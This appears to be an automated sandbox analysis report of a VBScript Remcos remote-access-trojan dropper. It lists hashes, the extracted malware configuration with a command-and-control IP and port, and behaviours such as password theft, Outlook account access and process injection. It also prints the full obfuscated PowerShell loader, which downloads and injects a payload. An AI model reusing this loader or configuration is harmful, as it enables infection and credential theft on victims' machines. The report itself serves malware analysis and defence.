Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25/11/2024, 06:17
Static task
static1
Behavioral task
behavioral1
Sample
Synliggre.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Synliggre.vbs
Resource
win10v2004-20241007-en
General
-
Target
Synliggre.vbs
-
Size
46KB
-
MD5
e5134e328ff4598e4f301cf33df16bec
-
SHA1
34a3fe3de95733db848f40638e31d628ea8e94da
-
SHA256
f57ea1cae9e6180b2f912e15dac0ca102e30c7b89fc2fb6f041841d09dea78a4
-
SHA512
355133afde717ab39a96bb2ea3ce4a1517624c704184b9c7715753bf8a0dea944ca8c23e4e3289365fd43ec410691865805243528a44efddaddc844ba99ae572
-
SSDEEP
768:cLtPCv/n84ubWF+77WPQLksyMWWwiRghC/JRXenPbUMSvoipHHch7hGEYmzEOms:cL1Cv/8NW06CksCWwugh+YPKoOHchtGk
Malware Config
Extracted
remcos
RemoteHost
154.216.18.157:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-N639VY
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/3056-62-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/956-63-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1332-61-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/956-63-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/3056-62-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 4 2844 WScript.exe 15 2112 powershell.exe 22 1704 msiexec.exe 23 1704 msiexec.exe 24 1704 msiexec.exe 26 1704 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1704 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4120 powershell.exe 1704 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1704 set thread context of 3056 1704 msiexec.exe 94 PID 1704 set thread context of 956 1704 msiexec.exe 95 PID 1704 set thread context of 1332 1704 msiexec.exe 96 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2112 powershell.exe 2112 powershell.exe 4120 powershell.exe 4120 powershell.exe 4120 powershell.exe 1332 msiexec.exe 1332 msiexec.exe 3056 msiexec.exe 3056 msiexec.exe 3056 msiexec.exe 3056 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4120 powershell.exe 1704 msiexec.exe 1704 msiexec.exe 1704 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeDebugPrivilege 1332 msiexec.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2844 wrote to memory of 2112 2844 WScript.exe 83 PID 2844 wrote to memory of 2112 2844 WScript.exe 83 PID 4120 wrote to memory of 1704 4120 powershell.exe 93 PID 4120 wrote to memory of 1704 4120 powershell.exe 93 PID 4120 wrote to memory of 1704 4120 powershell.exe 93 PID 4120 wrote to memory of 1704 4120 powershell.exe 93 PID 1704 wrote to memory of 3056 1704 msiexec.exe 94 PID 1704 wrote to memory of 3056 1704 msiexec.exe 94 PID 1704 wrote to memory of 3056 1704 msiexec.exe 94 PID 1704 wrote to memory of 3056 1704 msiexec.exe 94 PID 1704 wrote to memory of 956 1704 msiexec.exe 95 PID 1704 wrote to memory of 956 1704 msiexec.exe 95 PID 1704 wrote to memory of 956 1704 msiexec.exe 95 PID 1704 wrote to memory of 956 1704 msiexec.exe 95 PID 1704 wrote to memory of 1332 1704 msiexec.exe 96 PID 1704 wrote to memory of 1332 1704 msiexec.exe 96 PID 1704 wrote to memory of 1332 1704 msiexec.exe 96 PID 1704 wrote to memory of 1332 1704 msiexec.exe 96
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Synliggre.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$sadomasochistic='Oxycalorimeter';;$Crescendi='Charolaiskvgets166';;$Laanefonds169='Renderer';;$Vicoite='svejfningers';;$Lysenes='Outfinds';;$sprogforbistringers=$host.Name;function Burmanske($bebrejdelse){If ($sprogforbistringers) {$Uddykningerne=3} for ($stiftsfrknen=$Uddykningerne;;$stiftsfrknen+=4){if(!$bebrejdelse[$stiftsfrknen]) { break }$Livrekldt+=$bebrejdelse[$stiftsfrknen]}$Livrekldt}function Travhestene($Baretternes){ .($Rehabbed) ($Baretternes)}$stiftsfrknennarching=Burmanske '.onn VreEmhTt.n. E Wsome veBForcTiaL.kri ae,stnsomT';$Bolivias=Burmanske 'splMst oskazGaviOillTrilPiaaski/';$supergroups=Burmanske 'A tTsuplFiksM a1se.2';$Complicatedness=' tr[ Inn FaE nsT yn.AspsTr eskuRAnaVT liLamCAl eTolPKlkOFr IDaanai tsplMDruA man riah ggFe eUndRChe]Gro:sor:Rabs.orEManC pouPo Rsy.iPolTHenyBrdpArtRPinoFigT UnOsupcPraO,akl st= .n$Ls ss ruParpOveeN.nrsaiGAfkr LiO,riU phpAuts';$Bolivias+=Burmanske 'shi5 Di.Mes0Ber sp(T dW FoiFlenFisd Eno FowGalsp o talNstiTCli G a1Ani0End. No0Inc;fo, PhaWProiValn Mu6Dat4Pht;Fo Udxspe6Rep4 Fo;Bob GawrDisvMic:C e1 M.3Kom1 Yi.Vas0Ass)Pit leG IseCapc Flk acoE t/T k2Pyr0Qui1sno0Arb0stu1Ris0Ph 1 Fa InfFTriiJ rrricePlafByboRowxRen/De 1Dyr3Cin1 hi.Inc0';$Afgasses=Burmanske 'LeuU stsseleK.yrPul-Inga MegForeNeeNH.lT';$Ceilings=Burmanske ' BuhTratU at .mp co:p a/D c/PhlbUnp2 icLse5Oxa.sdmiGuicsteuHar/.amgT op .aK,ligMi,T.chZUriUsc WTro/sevTgnarGe astrkPr y H yUroe TrnUdssEll.En xGnas orn';$Botulismen=Burmanske 'Ps >';$Rehabbed=Burmanske 'C iI FoEPoux';$Manacling='sindbillederne';$markman='\Theligonaceae.sai';Travhestene (Burmanske 'Mut$WalG olEngOU,fBrioa FoL ,p:IndrbeseVerdst,IEreR niHusGFr,eMelR GaINo N imG lsTor= la$Page TiN,liVspi:s sAHemPsulPDiad HaaBr Tsv,a Fo+sel$ VimtitaT rrsoeK hamBriaNonn');Travhestene (Burmanske 'ser$samgs al anOshaB spaHopLUdl:ForDNondB,aImulR PrrsleIsa T spE,inRUngEU rnshidPhoeBrn= D.$ arcTrae oI,ndLsp iKarN .og ElsAff.W dssnlPMenlE,oIFe TJon(sto$C.ubAbuost,T,raUInuLExtIdivs rM ,neUrgnUrp)');Travhestene (Burmanske $Complicatedness);$Ceilings=$Ddirriterende[0];$Vatted49=(Burmanske 'Pri$.hegBygLNaboKilbsynasynL Ma:NatFP.eO ivd DyB,eloR aLBauDs de eNsunk anEt.nnUdss A 2C.t2 an6Ud = KaN,eaE VoWVe -F,mO ,iBMisJ PaeFencapeT.se slusspiyC rsAfgtBlaEInhmPro.Tyb$KunsPisTBioIhigFGl,tCirsskrFP.yRPeaK spNstoE JnNsysN ara ForKonC.clhDogI VaNNo g');Travhestene ($Vatted49);Travhestene (Burmanske ' Hy$ ,nFTavoBa,dUd b stoUrol kudJ re vinzorkgemeT pn WosUlt2P,u2Ube6Gyt.PerHInseFavaLufd Die M rGe.sskv[Nit$TabAAphfcomgRepaCa sstesTene.aasTel] il=sil$ .nBOmsotillHysiDubv OpiRega Ves');$Velbevarede=Burmanske 'Emi$maiFUnsoPardAnsbBe oForlFejdPayeTarnMonk EkeRetnThrs og2In,2 Be6sa .NudDspeo tuwddsn TelUn oMedaBundOpmF IniG,olskreP r(Mar$TnkCOpeeKoniTillnahiBa nOssgGavssu., ra$AngHto a Y wN,nkBaceToprPre)';$Hawker=$redirigerings;Travhestene (Burmanske 'Bed$.erg PrlRoloMirBRamaCu LHas:VirsTren.tyasavp PasUnheDef=A n(A otTreeDamsVenTTr.-NedPb,sAso,TArsH ma stj$scaH P,aRaawsi KOmseArbRtyr)');while (!$snapse) {Travhestene (Burmanske 'Ind$Kaig T lNonoCy.b OuaschlB r:DesBVale s,n UnustymBesbBebiTugnAksgUdd=Kak$Bo sInfk Udaf.st Trt TreFilk Whrs aesa,dO es iePelnHu eLeds') ;Travhestene $Velbevarede;Travhestene (Burmanske 'VdesPhaTPagaUndRE etEls-Bars M,lseeeF rERe,PA,s J 4');Travhestene (Burmanske ' i$ CegHyblKakoDe bTarAbudLFri: Mes siN.adAMyrpComs,lvePa =Bla( Mitstee BesRectMc.-O,tP oaPatTHazHsyr ,r$KryhRefaTorwProkOf eEntRVe )') ;Travhestene (Burmanske 'Cre$Radg,jrlP eOAppbs rAAngLc r:OffsEnvpCo.IPlar BliUneTNi Uomss elps ea DaARecVFloiOphRBrekjeeeCowT nc=Cop$smigsu lP,goLegbno aNonlsge:,ecFResi s LBalM.mmBUsvyProEbibrp r+sto+ j% Da$helD saDWaci udRne rFibiGolTBldEsterst.eP,iNEmmdE,ieRej.B scM toAppUO snTelT') ;$Ceilings=$Ddirriterende[$spirituspaavirket]}$Cloy=272326;$Decalomania=30171;Travhestene (Burmanske 'C r$ arg CoL EvOsamB avaAssL ie:svmiExpNTemVErgIfreTComaskatKomIMa o L nOrgs erkM.los lRIdet,juEHounspeeExa Tet=Cof D.oG kuEUdmtOve-Estc HyoDecN ElTDisEPron trtPe sus$CrahHoma emwB tkTipe aR');Travhestene (Burmanske 'Haa$ elgMu l Ovo,ylbselaB alPer: ChO nm rob rlOvegbete adIn eRens o Tai=Ras Ag[Ints smyForsHjat aePopm Ha.surCYpuoResnPytv aseGler ActP s]T.b:Rel:UbeF enrCykoEstms aBLiaa u sPapeTal6Aa 4 PrsP ttEs,rAphi anAmmg .n( Li$s,bIPrinTo,vTini rgt laaRectExciFo osatn abs Prk H,o Mar lot Fles pn,ileBra)');Travhestene (Burmanske 'C r$Be gextlWetoTu b Laa PrlIso:HorsCo uTunPst E D rJa s Noe nkDUndI KvNTryG et ur=s.r Enh[silsPowyBh sEdut.hieFd.MDad. kut poEEucXspit Ch. AbeV dNstrCBruo AnDCatIPilnElegA t] .l: P :AniA Arss mC Coi oriskl. egForE roTpomst ttForRstiIVidNBalgUd (.on$ s OMicMRetb sil AngJerEIndD ae UnsCec)');Travhestene (Burmanske ' D $ UnG .aL TrO igB ,nAstylgri:T.jaC ne,itNTrvDspuRsu.iDe nQuigmi sGamfQueO M RBrusAgll Ena MoGDem=iso$ .tsLenU B psupECraRTvisTheeNucDCeli Tun ngK n.AnisWi.UD.sb cusHydTaphr ecIUnfNB oGNed( k$E,ncNewLDisOD lY G.,Kva$P rdAndEAnecNeuaAn,L RioC uMHjraD,rNF giFibaA,l)');Travhestene $Aendringsforslag;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$sadomasochistic='Oxycalorimeter';;$Crescendi='Charolaiskvgets166';;$Laanefonds169='Renderer';;$Vicoite='svejfningers';;$Lysenes='Outfinds';;$sprogforbistringers=$host.Name;function Burmanske($bebrejdelse){If ($sprogforbistringers) {$Uddykningerne=3} for ($stiftsfrknen=$Uddykningerne;;$stiftsfrknen+=4){if(!$bebrejdelse[$stiftsfrknen]) { break }$Livrekldt+=$bebrejdelse[$stiftsfrknen]}$Livrekldt}function Travhestene($Baretternes){ .($Rehabbed) ($Baretternes)}$stiftsfrknennarching=Burmanske '.onn VreEmhTt.n. E Wsome veBForcTiaL.kri ae,stnsomT';$Bolivias=Burmanske 'splMst oskazGaviOillTrilPiaaski/';$supergroups=Burmanske 'A tTsuplFiksM a1se.2';$Complicatedness=' tr[ Inn FaE nsT yn.AspsTr eskuRAnaVT liLamCAl eTolPKlkOFr IDaanai tsplMDruA man riah ggFe eUndRChe]Gro:sor:Rabs.orEManC pouPo Rsy.iPolTHenyBrdpArtRPinoFigT UnOsupcPraO,akl st= .n$Ls ss ruParpOveeN.nrsaiGAfkr LiO,riU phpAuts';$Bolivias+=Burmanske 'shi5 Di.Mes0Ber sp(T dW FoiFlenFisd Eno FowGalsp o talNstiTCli G a1Ani0End. No0Inc;fo, PhaWProiValn Mu6Dat4Pht;Fo Udxspe6Rep4 Fo;Bob GawrDisvMic:C e1 M.3Kom1 Yi.Vas0Ass)Pit leG IseCapc Flk acoE t/T k2Pyr0Qui1sno0Arb0stu1Ris0Ph 1 Fa InfFTriiJ rrricePlafByboRowxRen/De 1Dyr3Cin1 hi.Inc0';$Afgasses=Burmanske 'LeuU stsseleK.yrPul-Inga MegForeNeeNH.lT';$Ceilings=Burmanske ' BuhTratU at .mp co:p a/D c/PhlbUnp2 icLse5Oxa.sdmiGuicsteuHar/.amgT op .aK,ligMi,T.chZUriUsc WTro/sevTgnarGe astrkPr y H yUroe TrnUdssEll.En xGnas orn';$Botulismen=Burmanske 'Ps >';$Rehabbed=Burmanske 'C iI FoEPoux';$Manacling='sindbillederne';$markman='\Theligonaceae.sai';Travhestene (Burmanske 'Mut$WalG olEngOU,fBrioa FoL ,p:IndrbeseVerdst,IEreR niHusGFr,eMelR GaINo N imG lsTor= la$Page TiN,liVspi:s sAHemPsulPDiad HaaBr Tsv,a Fo+sel$ VimtitaT rrsoeK hamBriaNonn');Travhestene (Burmanske 'ser$samgs al anOshaB spaHopLUdl:ForDNondB,aImulR PrrsleIsa T spE,inRUngEU rnshidPhoeBrn= D.$ arcTrae oI,ndLsp iKarN .og ElsAff.W dssnlPMenlE,oIFe TJon(sto$C.ubAbuost,T,raUInuLExtIdivs rM ,neUrgnUrp)');Travhestene (Burmanske $Complicatedness);$Ceilings=$Ddirriterende[0];$Vatted49=(Burmanske 'Pri$.hegBygLNaboKilbsynasynL Ma:NatFP.eO ivd DyB,eloR aLBauDs de eNsunk anEt.nnUdss A 2C.t2 an6Ud = KaN,eaE VoWVe -F,mO ,iBMisJ PaeFencapeT.se slusspiyC rsAfgtBlaEInhmPro.Tyb$KunsPisTBioIhigFGl,tCirsskrFP.yRPeaK spNstoE JnNsysN ara ForKonC.clhDogI VaNNo g');Travhestene ($Vatted49);Travhestene (Burmanske ' Hy$ ,nFTavoBa,dUd b stoUrol kudJ re vinzorkgemeT pn WosUlt2P,u2Ube6Gyt.PerHInseFavaLufd Die M rGe.sskv[Nit$TabAAphfcomgRepaCa sstesTene.aasTel] il=sil$ .nBOmsotillHysiDubv OpiRega Ves');$Velbevarede=Burmanske 'Emi$maiFUnsoPardAnsbBe oForlFejdPayeTarnMonk EkeRetnThrs og2In,2 Be6sa .NudDspeo tuwddsn TelUn oMedaBundOpmF IniG,olskreP r(Mar$TnkCOpeeKoniTillnahiBa nOssgGavssu., ra$AngHto a Y wN,nkBaceToprPre)';$Hawker=$redirigerings;Travhestene (Burmanske 'Bed$.erg PrlRoloMirBRamaCu LHas:VirsTren.tyasavp PasUnheDef=A n(A otTreeDamsVenTTr.-NedPb,sAso,TArsH ma stj$scaH P,aRaawsi KOmseArbRtyr)');while (!$snapse) {Travhestene (Burmanske 'Ind$Kaig T lNonoCy.b OuaschlB r:DesBVale s,n UnustymBesbBebiTugnAksgUdd=Kak$Bo sInfk Udaf.st Trt TreFilk Whrs aesa,dO es iePelnHu eLeds') ;Travhestene $Velbevarede;Travhestene (Burmanske 'VdesPhaTPagaUndRE etEls-Bars M,lseeeF rERe,PA,s J 4');Travhestene (Burmanske ' i$ CegHyblKakoDe bTarAbudLFri: Mes siN.adAMyrpComs,lvePa =Bla( Mitstee BesRectMc.-O,tP oaPatTHazHsyr ,r$KryhRefaTorwProkOf eEntRVe )') ;Travhestene (Burmanske 'Cre$Radg,jrlP eOAppbs rAAngLc r:OffsEnvpCo.IPlar BliUneTNi Uomss elps ea DaARecVFloiOphRBrekjeeeCowT nc=Cop$smigsu lP,goLegbno aNonlsge:,ecFResi s LBalM.mmBUsvyProEbibrp r+sto+ j% Da$helD saDWaci udRne rFibiGolTBldEsterst.eP,iNEmmdE,ieRej.B scM toAppUO snTelT') ;$Ceilings=$Ddirriterende[$spirituspaavirket]}$Cloy=272326;$Decalomania=30171;Travhestene (Burmanske 'C r$ arg CoL EvOsamB avaAssL ie:svmiExpNTemVErgIfreTComaskatKomIMa o L nOrgs erkM.los lRIdet,juEHounspeeExa Tet=Cof D.oG kuEUdmtOve-Estc HyoDecN ElTDisEPron trtPe sus$CrahHoma emwB tkTipe aR');Travhestene (Burmanske 'Haa$ elgMu l Ovo,ylbselaB alPer: ChO nm rob rlOvegbete adIn eRens o Tai=Ras Ag[Ints smyForsHjat aePopm Ha.surCYpuoResnPytv aseGler ActP s]T.b:Rel:UbeF enrCykoEstms aBLiaa u sPapeTal6Aa 4 PrsP ttEs,rAphi anAmmg .n( Li$s,bIPrinTo,vTini rgt laaRectExciFo osatn abs Prk H,o Mar lot Fles pn,ileBra)');Travhestene (Burmanske 'C r$Be gextlWetoTu b Laa PrlIso:HorsCo uTunPst E D rJa s Noe nkDUndI KvNTryG et ur=s.r Enh[silsPowyBh sEdut.hieFd.MDad. kut poEEucXspit Ch. AbeV dNstrCBruo AnDCatIPilnElegA t] .l: P :AniA Arss mC Coi oriskl. egForE roTpomst ttForRstiIVidNBalgUd (.on$ s OMicMRetb sil AngJerEIndD ae UnsCec)');Travhestene (Burmanske ' D $ UnG .aL TrO igB ,nAstylgri:T.jaC ne,itNTrvDspuRsu.iDe nQuigmi sGamfQueO M RBrusAgll Ena MoGDem=iso$ .tsLenU B psupECraRTvisTheeNucDCeli Tun ngK n.AnisWi.UD.sb cusHydTaphr ecIUnfNB oGNed( k$E,ncNewLDisOD lY G.,Kva$P rdAndEAnecNeuaAn,L RioC uMHjraD,rNF giFibaA,l)');Travhestene $Aendringsforslag;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\izsxwwzfxhli"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3056
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kbxpwojglpenjpm"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:956
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\uvlipguazxwatvbreqv"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d1414b301c11e310c55c6fd19b5beeb6
SHA1a9a8feef8d7bd65cb5a423665f5ca084672c1af8
SHA25694cb5e8396bc3c3e64e9a9c9cf794a9715148783bb0a91d8c8b77849838df6d0
SHA5121aecaa226433d392968e7ceec6fcabb625a138af4101c36f67cfe1174c4c1c0112999e4638e91664a6eb6a9b0b62a108e77902baec37ae4b59729ebe04fadda4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5bc25ccf39db8626dc249529bcc8c5639
SHA13e9cbdb20a0970a3c13719a2f289d210cdcc9e1d
SHA256b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904
SHA5129a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a
-
Filesize
393KB
MD594479799c0f8e7cbfe752471ef01f75a
SHA190483ec8a6fc7a020f0395dd139b733a4931d097
SHA2562e0fc18cb104faf216c7f3cf64dca48399c8fc0ecd351a3c8a628b95d6da00a8
SHA5124be97d7a34b6cfcd351ad9e5281b82ca5ba890d862fda13395da185cb4952b3173f3f6e3da26c28937c9c0482f737b34e61dcf96ca72896bae4db0b1f82c23b4